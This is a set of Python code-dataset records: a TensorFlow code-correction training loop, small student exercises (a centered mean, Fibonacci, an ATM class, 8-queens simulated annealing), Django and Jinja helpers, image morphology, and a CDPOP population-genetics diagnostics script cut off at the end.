behavior_weights\n\n return behavior_function\n\n\n# Hidden size of LSTM recurrent cell\nLSTM_SIZE = len(DATASET_VOCABULARY) * 2\n\n\n# Compute syntax label with brnn\ndef inference_syntax_python(program_batch, length_batch):\n\n # Define forward and backward rnn layers\n lstm_forward = tf.contrib.rnn.LSTMCell(LSTM_SIZE)\n lstm_backward = tf.contrib.rnn.LSTMCell(LSTM_SIZE)\n initial_state = lstm_forward.zero_state(BATCH_SIZE, tf.float32)\n\n \n # Compute rnn activations\n output_batch, state_batch = tf.nn.bidirectional_dynamic_rnn(\n lstm_forward, \n lstm_backward, \n program_batch,\n initial_state_fw = initial_state,\n initial_state_bw = initial_state,\n sequence_length=length_batch,\n dtype=tf.float32)\n\n\n # Take linear combination of hidden states and produce syntax label\n softmax_w = initialize_weights_cpu((PREFIX_SOFTMAX + EXTENSION_WEIGHTS), [DATASET_MAXIMUM, LSTM_SIZE*2])\n softmax_b = initialize_biases_cpu((PREFIX_SOFTMAX + EXTENSION_BIASES), [1])\n logits = tf.add(tf.tensordot(tf.concat(output_batch, 2), softmax_w, 2), softmax_b)\n\n return logits\n\n\n# Compute loss for syntax discriminator\ndef loss(prediction, labels):\n\n # Calculate huber loss of prediction\n huber_loss = tf.losses.huber_loss(labels, prediction)\n\n\n # Calculate the mean loss across batch\n huber_loss_mean = tf.reduce_mean(huber_loss)\n tf.add_to_collection(COLLECTION_LOSSES, huber_loss_mean)\n\n return huber_loss_mean\n\n\n# Hyperparameters\nINITIAL_LEARNING_RATE = 0.001\nDECAY_STEPS = 10 * EPOCH_SIZE\nDECAY_FACTOR = 0.95\n\n\n# Compute loss gradient and update parameters\ndef train(total_loss):\n\n # Keep track of current training step\n global_step = tf.train.get_or_create_global_step()\n\n\n # Decay learning rate\n learning_rate = tf.train.exponential_decay(\n INITIAL_LEARNING_RATE,\n global_step,\n DECAY_STEPS,\n DECAY_FACTOR,\n staircase=True)\n\n\n # Create optimizer for gradient updates\n optimizer = tf.train.AdamOptimizer(learning_rate)\n\n\n # Minimize loss using optimizer\n 
gradient = optimizer.minimize(total_loss, global_step=global_step)\n\n return gradient\n\n\n# Run single training cycle on dataset\ndef train_epf_8(num_epoch=10):\n\n # Watch compute time per batch\n from time import time\n from datetime import datetime\n\n\n # Convert epoch to batch steps\n num_steps = num_epoch * EPOCH_SIZE\n\n\n # Create new graph\n with tf.Graph().as_default():\n\n # Compute single training batch\n name_batch, examples_batch, program_batch, length_batch = training_batch_python()\n\n\n # Compute corrected code\n corrected_batch = inference_generator_python(program_batch)\n\n\n # Compute syntax of corrected code\n syntax_batch = inference_syntax_python(corrected_batch, length_batch)\n syntax_loss = loss(syntax_batch, tf.constant([1. for i in range(BATCH_SIZE)], tf.float32))\n\n\n # Compute behavior of corrected code\n behavior_batch = inference_behavior_python(corrected_batch)\n for n in range(DATASET_IO_EXAMPLES):\n input_example = tf.constant([n for i in range(BATCH_SIZE)], tf.float32)\n output_prediction = behavior_batch(input_example)\n behavior_loss = loss(output_prediction, input_example)\n\n\n # Obtain total loss of entire model\n total_loss = tf.add_n(tf.get_collection(COLLECTION_LOSSES), name=(PREFIX_TOTAL + EXTENSION_LOSS))\n gradient_batch = train(total_loss)\n\n\n # Store datapoints each epoch for plot\n data_points = []\n\n\n # Report testing progress\n class LogProgressHook(tf.train.SessionRunHook):\n\n # Session is initialized\n def begin(self):\n self.current_step = 0\n self.batch_speed = 0\n\n\n # Just before inference\n def before_run(self, run_context):\n self.current_step += 1\n self.start_time = time()\n return tf.train.SessionRunArgs([syntax_batch, syntax_loss])\n\n\n # Just after inference\n def after_run(self, run_context, run_values):\n\n # Calculate weighted speed\n self.batch_speed = (0.2 * self.batch_speed) + (0.8 * (1.0 / (time() - self.start_time + 1e-7)))\n\n\n # Update every period of steps\n if (self.current_step % EPOCH_SIZE == 0):\n\n # Obtain graph results\n syntax_value, loss_value = run_values.results\n\n\n # Display date, batch speed, estimated time, loss, and accuracy\n print(\n datetime.now(),\n \"CUR: %d\" % self.current_step,\n \"REM: %d\" % (num_steps - self.current_step),\n \"SPD: %.2f bat/sec\" % self.batch_speed,\n \"ETA: %.2f hrs\" % ((num_steps - self.current_step) / self.batch_speed / 60 / 60),\n \"L: %.2f\" % loss_value)\n\n\n # Record current loss\n data_points.append(loss_value)\n\n\n # Prepare to save and load models\n model_saver = tf.train.Saver()\n\n\n # Perform computation cycle based on graph\n with tf.train.MonitoredTrainingSession(hooks=[\n tf.train.StopAtStepHook(num_steps=100),\n tf.train.CheckpointSaverHook(\n CHECKPOINT_BASEDIR,\n save_steps=EPOCH_SIZE,\n saver=model_saver)]) as session:\n\n # Repeat training iteratively\n while not session.should_stop():\n\n # Run single batch of training\n session.run(gradient_batch)\n\n\n # Construct and save plot\n import matplotlib.pyplot as plt\n plt.plot(data_points)\n plt.xlabel(\"Training Epoch\")\n plt.ylabel(\"Mean Huber Syntax Loss\")\n plt.savefig(datetime.now().strftime(\"%Y_%B_%d_%H_%M_%S\") + \"_syntax_training_loss.png\")\n\nif __name__ == \"__main__\":\n train_epf_8()\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":12717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"109063696","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 11 17:30:38 
2019\n\n@author: Education\n\"\"\"\n\nlist1=list(map(int,input().split()))\ndef centered(list2):\n    sort_list=[]\n    sort_list=sorted(list2)\n    print(sort_list)\n    sum1=0\n    add=0\n    a=len(list2)\n    for i in sort_list[1:a-1]:\n        sum1=sum1+i\n    add=len(list2)-2\n    mean_avg=0.0\n    mean_avg=(sum1/add)\n    return mean_avg\na=centered(list1)\nprint(a)\n    \n\n\n","sub_path":"centered.py","file_name":"centered.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"119258918","text":"from datetime import datetime\n\ndef datetimeformat(value, format='%B %d, %Y'):\n    if value:\n        init_date = datetime.strptime(str(value), '%Y-%m-%d %H:%M:%S.%f')\n        return init_date.strftime(format)\n    else:\n        return '-'\n\n\ndef days_since_init_contact(value):\n    init_date = datetime.strptime(value, '%Y-%m-%d %H:%M:%S.%f')\n    now = datetime.now()\n    difference = now - init_date\n\n    #convert the difference into seconds\n    difference = difference.total_seconds()\n\n    #do some math to convert the seconds into days\n    minutes = difference / 60\n    hours = minutes / 60\n    days = hours / 24\n\n    if days < 1:\n        return '<1 day ago'\n    elif int(days) < 2:\n        return '1 day ago'\n    else:\n        return str(int(days)) + ' days ago'","sub_path":"filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"162510445","text":"import math\n\n# Define some constants.\nsqrt5 = math.sqrt(5)\nphi = (1+sqrt5)/2\n\ndef fib(n):\n\treturn math.floor(math.pow(phi,n+1)/sqrt5 + 0.5)\n\n# Return list of fib sequence up to nth.\ndef fib_list(n):\n\tlist = []\n\tfor i in range(n):\n\t\tlist += [fib(i)]\n\treturn list\n","sub_path":"code/moving_average_naive/fib.py","file_name":"fib.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"576320406","text":"#coding:utf-8\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom homeapp.BLL.ttest_service import ttest_service\nfrom homeapp.BLL.tnote_service import tnote_service\nfrom homeapp.models import TNote\nimport time\nimport datetime\nimport json\nimport uuid\n\nclass note:\n\n    @staticmethod\n    def index(request):\n\n        # Query the database\n        items = tnote_service.selectall()\n        obj = {\n            \"viewmodel\":{\n                \"items\":items\n            }\n        }\n        # print obj[\"viewmodel\"][\"items\"][0]\n        return render(request, \"homeapp/note_index.html\", obj)\n\n    \t# return render(request, \"homeapp/note_index.html\", pageModel)\n\n    @staticmethod\n    def ajax_addnote(request):\n\n        ajaxmodel = {}\n\n        # Get the submitted title\n        TxtValue = request.POST.get(\"title\")\n\n        # Get the current time\n        thistime = time.localtime()\n        strtime = time.strftime(\"%Y-%m-%d\", thistime)\n        LogDateTime = datetime.datetime.strptime(strtime, \"%Y-%m-%d\")\n\n        # guid\n        guidvalue=str(uuid.uuid1())\n\n        # Author id (temporary)\n        AGValue = str(uuid.uuid1())\n\n        # NoteType_Guid\n        NoteType_Guid = \"cfd58bcb-f96d-11e5-ac22-000c29a84f46\"\n\n        # Path\n        ajaxmodel[\"guid\"] = guidvalue\n        ajaxmodel[\"Account_Guid\"] = AGValue\n        # ajaxmodel[\"NoteDateTime\"] = time.strftime(\"%Y-%m-%d\",LogDateTime)\n        ajaxmodel[\"Path\"] = \"\"\n        ajaxmodel[\"Text\"] = TxtValue\n        ajaxmodel[\"NoteType_Guid\"] = NoteType_Guid\n\n        # Add to the database\n        newnote = TNote(guid=guidvalue\n                        ,Account_Guid=AGValue\n                        ,NoteDateTime=LogDateTime\n                        ,Path=\"\"\n                        ,Text=TxtValue\n                        ,NoteType_Guid = 
\"cfd58bcb-f96d-11e5-ac22-000c29a84f46\")\n newnote.save()\n\n return HttpResponse(json.dumps(ajaxmodel), content_type=\"application/json\")\n\"\"\"\n retdata = {}\n retdata['name'] = 'abc'\n retdata['pwd'] = 'cde'\n retdata['arr'] = [{\n \"name\":123\n },\n {\n \"name\":123,\n \"pwd\":333\n }]\n return HttpResponse(json.dumps(retdata), content_type=\"application/json\")\n #\n\"\"\"\n\"\"\"\nimport json\nfrom django.http import HttpResponse\n\nresponse_data = {}\nresponse_data['result'] = 'failed'\nresponse_data['message'] = 'You messed up'\nreturn HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\"\"\"\n","sub_path":"cpp13_jsb_project/homeapp/CONTROLLER/note_controller.py","file_name":"note_controller.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"584393513","text":"import cv2\nimport numpy as np\n\n\ndef erosion(img):\n w = img.shape[0]\n h = img.shape[1]\n dil = np.zeros((w, h))\n for i in range(w):\n for j in range(h):\n if (img[i][j] == 255):\n if (i == 0 or j == 0 or i == w - 1 or j == h - 1):\n continue\n if (img[i - 1][j - 1] == 255 and img[i - 1][j] == 255 and img[i - 1][j + 1] == 255 and img[i][\n j - 1] == 255 and img[i][j] == 255 and img[i][j + 1] == 255 and img[i + 1][j - 1] == 255 and img[i + 1][\n j] == 255 and img[i + 1][j + 1] == 255):\n dil[i][j] = 255\n\n return dil\n\n\ndef dilation(img_r, r, c):\n for i in range(0, r - 2):\n for j in range(0, c - 2):\n if (img_r[i][j] == 255 or img_r[i][j + 1] == 255 or img_r[i][j + 2] == 255 or img_r[i + 1][j] == 255 or\n img_r[i + 1][j + 2] == 255 or img_r[i + 2][j] == 255 or img_r[i + 2][j + 1] == 255 or img_r[i + 2][\n j + 2] == 255):\n img_r[i][j] = 255\n return img_r\n\n\n#Please change path\nimage_colour = cv2.imread('/Users/vivad/PycharmProjects/CLFinalProject/original_imgs/noise.jpg', 0)\nimage_dupe = image_colour.copy()\nimageAA = image_colour.copy()\nimg_len = image_dupe.shape\nr = img_len[0]\nc = img_len[1]\n\n# Morphology algorithm 1 -\n# Closing followed by opening\n# Closing Operation - Dilation + Erosion\ndil1 = dilation(image_dupe, r, c)\ndil_copy = dil1.copy()\nafter_erosion = erosion(dil_copy)\n\n# Opening Operation - Erosion + Dilation\nagain_erosion = erosion(after_erosion)\nerosion_copy = again_erosion.copy()\nfinal_algo1_output = dilation(erosion_copy, r, c)\n\n# Morphology algorithm 2\n# Opening followed by closing\n# Opening Operation - Erosion + Dilation\nimageA = erosion(imageAA)\nimageB = imageA.copy()\nimageC = dilation(imageB, r, c)\n\n# Closing Operation - Dilation + Erosion\nimageD = dilation(imageC, r, c)\nimageE = imageD.copy()\nfinal_algo2_output = erosion(imageE)\n\n#Please change path\ncv2.imwrite(\"/Users/vivad/PycharmProjects/CLFinalProject/Task1/res_noise2.jpg\", final_algo2_output)\ncv2.imwrite(\"/Users/vivad/PycharmProjects/CLFinalProject/Task1/res_noise1.jpg\", final_algo1_output)\n\n# Computing boundaries of images using difference between morphed image and its erosion result\nFinal_A = final_algo1_output.copy()\nFinal_B = final_algo2_output.copy()\n\nerode_B = erosion(Final_B)\nerode_A = erosion(Final_A)\nres_bound1 = Final_A - erode_A\nres_bound2 = Final_B - erode_B\n\n\n#Please change path\ncv2.imwrite(\"/Users/vivad/PycharmProjects/CLFinalProject/Task1/res_bound1.jpg\", res_bound1)\ncv2.imwrite(\"/Users/vivad/PycharmProjects/CLFinalProject/Task1/res_bound2.jpg\", 
res_bound2)\n\n\n","sub_path":"Project_3/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"436612371","text":"class Atm(object):\r\n    def __init__(self,name,pin,):\r\n        self.name=name\r\n        self.pin=pin\r\n    \r\n    def info(self):\r\n        print(\"Account name is : \"+self.name)\r\n        print(\"card pin is : \"+self.pin)\r\n    \r\nAtm1=Atm(\"Avaneesh Sawant\",\"2364\")\r\nAtm2=Atm(\"Sanjana Sawant\",\"3018\")\r\nAtm1.info()\r\n\r\n\r\n    ","sub_path":"atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"440967080","text":"from math import log, exp, fabs, inf\nfrom random import randint, random, seed\nfrom os import system\nimport subprocess as sp\nfrom time import sleep\n\n\nclass SimulatedAnnealing:\n    \"\"\"\n    Queens are represented as a list of position\n    E.g.: [1, 5, 3, 5, 2, 6, 0, 7] that is\n    Queen in first column is in 2nd cell and\n    Queen in 7th column is in 1st cell\n    \"\"\"\n\n    def __init__(self, t_max=500., t_min=0, steps=500):\n        self.T_max = t_max\n        self.T_min = t_min\n        # self.T_factor = -log(self.T_max / self.T_min)\n        self.steps = steps\n        self.T = t_max\n        seed(1)\n\n    def schedule(self, t):\n        return self.T_max * exp(self.T_factor * t / self.steps)\n\n    def schedule2(self, t):\n        T = self.T_max - ((self.T_max - self.T_min) / self.steps) * t\n        return T\n\n    def anneal(self, initial_state=None, visualize=True, animation=False, log_output=None):\n        if initial_state is None:\n            current_state = self.random_initial_state()\n        else:\n            current_state = initial_state\n        if log_output is None:\n            log_output = animation\n\n        t = 0\n        while True:\n            t += 1\n            temperature = self.schedule2(t)\n            # if temperature < self.T_min + 0.01:\n            if temperature < 0:\n                if visualize:\n                    return self.tap(self.visualize, current_state)\n                else:\n                    return current_state\n            next_state = self.random_successor(current_state)\n            next_value = self.value(next_state)\n            if next_value == inf:\n                break\n            current_value = self.value(current_state)\n            d_energy = next_value - current_value\n\n            if animation:\n                # system(\"cls\")\n                sleep(1)\n                tmp = sp.call('cls', shell=True)\n            if log_output:\n                self.visualize(current_state, {\"ΔE\": d_energy, \"Time\": t})\n\n            if d_energy > 0:\n                current_state = next_state\n            elif exp(d_energy / temperature) > random():\n                current_state = next_state\n\n        if visualize:\n            tmp = sp.call('cls', shell=True)\n            return self.tap(self.visualize, current_state)\n        else:\n            return current_state\n\n    @staticmethod\n    def random_initial_state():\n        state = [randint(0, 7) for i in range(8)]\n        return state\n\n    @staticmethod\n    def random_successor(current):\n        rand_queen = randint(0, 7)\n        rand_move = randint(0, 7) - current[rand_queen]\n        successor = [value for value in current]\n        successor[rand_queen] += rand_move\n        return successor\n\n    @staticmethod\n    def count_checks(state):\n        checks = 0\n        for i in range(8):\n            for j in range(i + 1, 8):\n                if state[i] == state[j]:\n                    checks += 1\n                elif fabs(SimulatedAnnealing.slop(i, state[i], j, state[j])) == 1:\n                    checks += 1\n        return checks\n\n    @staticmethod\n    def value(state):\n        checks = SimulatedAnnealing.count_checks(state)\n        if checks == 0:\n            return inf\n        return 56 / checks\n\n    @staticmethod\n    def slop(x1, y1, x2, y2):\n        return (x1 - x2) / (y1 - y2)\n\n    @staticmethod\n    def tap(func, value):\n        func(value)\n        return value\n\n    @staticmethod\n    def visualize(state, params={}):\n        printf 
= lambda *args: print(*args, end='')\n min_check = inf\n for i in range(8):\n printf(\"| \")\n for j in range(8):\n if state[j] is i:\n printf(\"Q | \")\n else:\n new_state = [value for value in state]\n new_state[i] = j\n check = SimulatedAnnealing.count_checks(new_state)\n if check < min_check:\n min_check = check\n printf(\"{}{}| \".format(check, ' ' if check < 10 else ''))\n printf(\"\\n\")\n\n for key, check in params.items():\n print(\"{}: {}\".format(key, check))\n printf(\"min check: {}\".format(min_check))\n print(\"\")\n\n\nSimulatedAnnealing(steps=200).anneal(animation=True)\n","sub_path":"assignments/assignment3/SimulatedAnnealing.py","file_name":"SimulatedAnnealing.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"205044833","text":"# -----------------------------------------------------------------------------\n# diagnostics.py\n# 2014 01 29: Erin Landguth\n# This script grabs output.csv files, splits bars, and grabs diagnostics for checking CDPOP/CDFISH/CDmetaPOP\n# v0 - Initial script\n# ----------------------------------------------------------------------------- \n\n# Load modules\nimport os,pdb,pandas\nfrom pylab import *\t\nimport scipy as sp\t\t\t\n\n# Numpy functions\ntry:\n\timport numpy as np \n\tfrom numpy.random import *\nexcept ImportError:\n\traise ImportError(\"Numpy required.\")\n\n# ---------\n# User info\n# ---------\n# Directory locations of folders\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_expN_120gens_2K500N_Kenv1000_1411750885/'\n#plottitle = 'PAN Stable 2K Exponential N'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_expAtBirth_120gens_2K500N_Kenv1000_1411751507/'\nplottitle = 'PAN Stable 2K Exponential AtBirth'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_logAtBirth_120gens_2K500N_Kenv1000_1411751520/'\nplottitle = 'PAN Stable 2K Logistic AtBirth'\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_logN_120gens_2K500N_Kenv1000_1411748653/'\n#plottitle = 'PAN Stable 2K Logistic N'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanIncrease_exp_50gens_2K500N_1411754599/'\nplottitle = 'PAN Increasing 2K Exponential N'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanStable_exps0pt26_120gens_2K500N_1411753815/'\nplottitle = 'PAN Increasing s0=0.26 2K Exponential N'\n\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanDecrease_exp_100gens_2K500N_1411759172/'\nplottitle = 'PAN Decreasing s0=0.24 2K Exponential N'\n\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/IBDStable_exp_400gens_2K500N_testHe_1411763780/'\nplottitle = 'IBDMax Stable s0=0.25... 2K Exponential N'\ndir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanFluctuate_exp_94gens_2K500N_1411764557/'\nplottitle = 'PAN Fluctuate s0=0.25... 
2K Exponential N'\n\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/IBDIncrease_pt29_exp_50gens_2K500N_1411766939/'\n#plottitle = 'IBD Increase s0=0.29 2K Exponential N'\n\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/IBDDecrease_pt21_exp_50gens_2K500N_1411766969/'\n#plottitle = 'IBD Decrease s0~0.21 2K Exponential N'\n\n#dir = 'D:/projects/CDPOP/TemporalDynamics/Runs/2Kdata/PanFluctuate_log_94gens_2K500N_1411831887/'\n#plottitle = 'PAN Fluctuate s0~0.29 to 0.21 2K Logistic N'\n\nsavename = ''\noutdir = dir\n\nsavedpi = 300\nqnorm = 1.959964 # For CIs, not in function \ngen = 94 # Number of years \nnthfile = list(range(0,gen,1))\nmaxA = 900 # loci * alleles\nbatchno = 1 # Number of batches\nmcno = 7 # Number of MCs\nplottime = np.asarray([1,9,19])\nK = 2000\n\n# List folders in this directory\ndef listdirs(folder):\n return [d for d in (os.path.join(folder, d1) for d1 in os.listdir(folder)) if os.path.isdir(d)]\nfolderList = listdirs(dir)\n\n# ---------------------------------\n# Storage variables\n# ---------------------------------\n# Store values\nN = [] # 1\nN_age = []\ngrowthrate = []\ntotF = [] # 4\ntotM = [] #5\nbreedF = [] #6\nbreedM = [] #8\nbirths = [] #13\nmort_age = [] # 15\n\nalleles = [] #16\nHe = [] #17\nHo = [] #18\n'''\noutputtitle = ['Year','Population','Population_Age','ToTFemales','ToTMales',\\\n\t'BreedFemales','BreedFemales_Age','BreedMales','BreedEvents_Females','Females_NoMate',\\\n\t'Migrants','DisperseDeaths','Births','EggDeaths',\\\n\t'AgeDeaths','Alleles','He','Ho','Mutations',\\\n\t'MateDistED','MateDistEDstd','Female_DispDistED','Female_DispDistEDstd',\\\n\t'Male_DispDistED','Male_DispDistEDstd','MateDistCD','MateDistCDstd',\\\n\t'Female_DispDistCD','Female_DispDistCDstd','Male_DispDistCD','Male_DispDistCDstd',\\\n\t'p1','p2','q1','q2','Infected','SubpopImmigration','SubpopEmigration','FemalesMeanMate',\\\n\t'MalesMeanMate','FemalesSDMate','MalesSDMate','OpenLocations','CouldNotDisperse']\n'''\n# Loop through batches\nfor ibatch in range(batchno):\n\n\t# Add storage spot\n\tN.append([])\n\tN_age.append([])\n\tgrowthrate.append([])\n\ttotM.append([])\n\ttotF.append([])\n\tbreedF.append([])\n\tbreedM.append([])\n\tbirths.append([])\t\n\tmort_age.append([]) #11 with total\n\talleles.append([])\n\tHe.append([])\n\tHo.append([])\n\t\n\t# Loop through MCs\n\tfor imc in range(mcno):\n\t\n\t\t# Open output.csv file in folder\n\t\tinputfile = open(dir+'batchrun'+str(ibatch)+'mcrun'+str(imc)+'/output.csv')\n\t\t\n\t\t# Read lines from the file\n\t\tlines = inputfile.readlines()\n\n\t\t#Close the file\n\t\tinputfile.close()\n\n\t\t# Create an empty matrix to append to\n\t\tvalues = []\n\n\t\t# Split up each line in file and append to empty matrix for generation specified\n\t\tfor i in range(len(lines)):\n\t\t\tthisline = lines[i].split(',')\n\t\t\tvalues.append(thisline)\n\n\t\t# Delete lines\n\t\tdel(lines)\n\t\t\n\t\t# Store values\n\t\tN[ibatch].append([])\n\t\tN_age[ibatch].append([])\n\t\tgrowthrate[ibatch].append([])\n\t\ttotM[ibatch].append([])\n\t\ttotF[ibatch].append([])\n\t\tbreedF[ibatch].append([])\n\t\tbreedM[ibatch].append([])\n\t\tbirths[ibatch].append([])\n\t\tmort_age[ibatch].append([]) #11 with total\n\t\talleles[ibatch].append([])\n\t\tHe[ibatch].append([])\n\t\tHo[ibatch].append([])\n\t\t\n\t\t# Then Loop through generations/time\n\t\tfor iout in 
range(gen):\n\t\t\n\t\t\talleles[ibatch][imc].append([])\n\t\t\tHe[ibatch][imc].append([])\n\t\t\tHo[ibatch][imc].append([])\n\t\t\tmort_age[ibatch][imc].append([])\n\t\t\tN_age[ibatch][imc].append([])\n\t\t\t\n\t\t\t# Patch split - grab the first value\n\t\t\tN[ibatch][imc].append(float(int(values[1+iout][1].split('|')[0])))\n\t\t\ttotF[ibatch][imc].append(int(values[1+iout][4].split('|')[0]))\n\t\t\ttotM[ibatch][imc].append(int(values[1+iout][5].split('|')[0]))\n\t\t\tbreedF[ibatch][imc].append(int(values[1+iout][6].split('|')[0]))\n\t\t\tbreedM[ibatch][imc].append(int(values[1+iout][8].split('|')[0]))\n\t\t\tbirths[ibatch][imc].append(int(values[1+iout][13].split('|')[0]))\n\t\t\tif values[1+iout][3] == 'NA':\n\t\t\t\tgrowthrate[ibatch][imc].append(np.nan)\n\t\t\telse:\n\t\t\t\tgrowthrate[ibatch][imc].append(float(values[1+iout][3]))\n\t\t\t\t\t\t\n\t\t\t# Age split\n\t\t\tfor j in range(len(values[1+iout][15].split('|'))-1):\n\t\t\t\tmort_age[ibatch][imc][iout].append(float(values[1+iout][15].split('|')[j]))\n\t\t\t\tN_age[ibatch][imc][iout].append(float(values[1+iout][2].split('|')[j]))\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t# Grab all patch values - patch values with total\n\t\t\tfor j in range(len(values[1+iout][16].split('|'))-1):\n\t\t\t\talleles[ibatch][imc][iout].append(float(values[1+iout][16].split('|')[j]))\n\t\t\t\tHe[ibatch][imc][iout].append(float(values[1+iout][17].split('|')[j]))\n\t\t\t\tHo[ibatch][imc][iout].append(float(values[1+iout][18].split('|')[j]))\n\t\t\t\t\t\t\t\n\t\t\t\n# Turn into arrays\nbirths = np.asarray(births)\ntotF = np.asarray(totF)\nalleles = np.asarray(alleles)\nHe = np.asarray(He)\nHo = np.asarray(Ho)\nallD = (alleles - 1) / (maxA - 1.)\nN = np.asarray(N)\ntotM = np.asarray(totM)\nbreedF = np.asarray(breedF)\nbreedM = np.asarray(breedM)\nmort_age = np.asarray(mort_age)\nN_age = np.asarray(N_age)\ngrowthrate = np.asarray(growthrate)\n\n# --------------------------------------------\n# Get mean over Monte Carlosfor each batch run\n# --------------------------------------------\n# Get Mean, SD, error, Left and Right\nN_m = np.nansum(N[:][:],axis=1)/mcno\nN_sd = np.std(N[:][:],axis=1)\t\nerror = qnorm*N_sd/(mcno)\nN_l = N_m-error\nN_r = \tN_m+error\nN_min = np.min(N[:][:],axis=1)\nN_max = np.max(N[:][:],axis=1)\t\n\ngrowthrate_m = np.nansum(growthrate[:][:],axis=1)/mcno\ngrowthrate_sd = np.std(growthrate[:][:],axis=1)\t\nerror = qnorm*growthrate_sd/(mcno)\ngrowthrate_l = growthrate_m-error\ngrowthrate_r = \tgrowthrate_m+error\ngrowthrate_min = np.min(growthrate[:][:],axis=1)\ngrowthrate_max = np.max(growthrate[:][:],axis=1)\n\ntotM_m = np.nansum(totM[:][:],axis=1)/mcno\ntotM_sd = np.std(totM[:][:],axis=1)\t\nerror = totM_sd*qnorm/mcno\ntotM_l = totM_m-error\ntotM_r = \ttotM_m+error\ntotM_min = np.min(totM[:][:],axis=1)\ntotM_max = np.max(totM[:][:],axis=1)\n\ntotF_m = np.nansum(totF[:][:],axis=1)/mcno\ntotF_sd = np.std(totF[:][:],axis=1)\t\nerror = qnorm*totF_sd/(mcno)\ntotF_l = totF_m-error\ntotF_r = \ttotF_m+error\ntotF_min = np.min(totF[:][:],axis=1)\ntotF_max = np.max(totF[:][:],axis=1)\n\nbreedF_m = np.nansum(breedF[:][:],axis=1)/mcno\nbreedF_sd = np.std(breedF[:][:],axis=1)\t\nerror = qnorm*breedF_sd/(mcno)\nbreedF_l = breedF_m-error\nbreedF_r = \tbreedF_m+error\nbreedF_min = np.min(breedF[:][:],axis=1)\nbreedF_max = np.max(breedF[:][:],axis=1)\n\nbreedM_m = np.nansum(breedM[:][:],axis=1)/mcno\nbreedM_sd = np.std(breedM[:][:],axis=1)\t\nerror = qnorm*breedM_sd/(mcno)\nbreedM_l = breedM_m-error\nbreedM_r = \tbreedM_m+error\nbreedM_min = 
np.min(breedM[:][:],axis=1)\nbreedM_max = np.max(breedM[:][:],axis=1)\nbirths_m = np.nansum(births[:][:],axis=1)/mcno\nbirths_sd = np.std(births[:][:],axis=1)\t\nerror = qnorm*births_sd/(mcno)\nbirths_l = births_m-error\nbirths_r = \tbirths_m+error\nbirths_min = np.min(births[:][:],axis=1)\nbirths_max = np.max(births[:][:],axis=1)\n\nmort_age_m = np.nansum(mort_age[:][:],axis=1)/mcno\nmort_age_sd = np.std(mort_age[:][:],axis=1)\t\nerror = qnorm*mort_age_sd/(mcno)\nmort_age_l = mort_age_m-error\nmort_age_r = \tmort_age_m+error\nmort_age_min = np.min(mort_age[:][:],axis=1)\nmort_age_max = np.max(mort_age[:][:],axis=1)\n\nN_age_m = np.nansum(N_age[:][:],axis=1)/mcno\nN_age_sd = np.std(N_age[:][:],axis=1)\t\nerror = qnorm*N_age_sd/(mcno)\nN_age_l = N_age_m-error\nN_age_r = \tN_age_m+error\nN_age_min = np.min(N_age[:][:],axis=1)\nN_age_max = np.max(N_age[:][:],axis=1)\n\nHe_m = np.nansum(He[:][:],axis=1)/mcno\nHe_sd = np.std(He[:][:],axis=1)\t\nerror = qnorm*He_sd/(mcno)\nHe_l = He_m-error\nHe_r = \tHe_m+error\nHe_min = np.min(He[:][:],axis=1)\nHe_max = np.max(He[:][:],axis=1)\n\nHo_m = np.nansum(Ho[:][:],axis=1)/mcno\nHo_sd = np.std(Ho[:][:],axis=1)\t\nerror = qnorm*Ho_sd/(mcno)\nHo_l = Ho_m-error\nHo_r = \tHo_m+error\nHo_min = np.min(Ho[:][:],axis=1)\nHo_max = np.max(Ho[:][:],axis=1)\n\nallD_m = np.nansum(allD[:][:],axis=1)/mcno\nallD_sd = np.std(allD[:][:],axis=1)\t\nerror = qnorm*allD_sd/(mcno)\nallD_l = allD_m-error\nallD_r = \tallD_m+error\n\n# --------------------------------\n# Other summary data \n# -------------------------------- \n\n# Growth rate - total population Nt / Nt-1\nNt = N[:,:,1:gen] / N[:,:,0:gen-1]\nN_growth_pop_m = np.nansum(Nt[:][:],axis=1)/(mcno)\nN_growth_pop_sd = np.nanstd(Nt[:][:],axis=1)\t\nerror = qnorm*N_growth_pop_sd/(mcno)\nN_growth_pop_l = N_growth_pop_m-error\nN_growth_pop_r = \tN_growth_pop_m+error\nN_growth_pop_min = np.nanmin(Nt[:][:],axis=2)\nN_growth_pop_max = 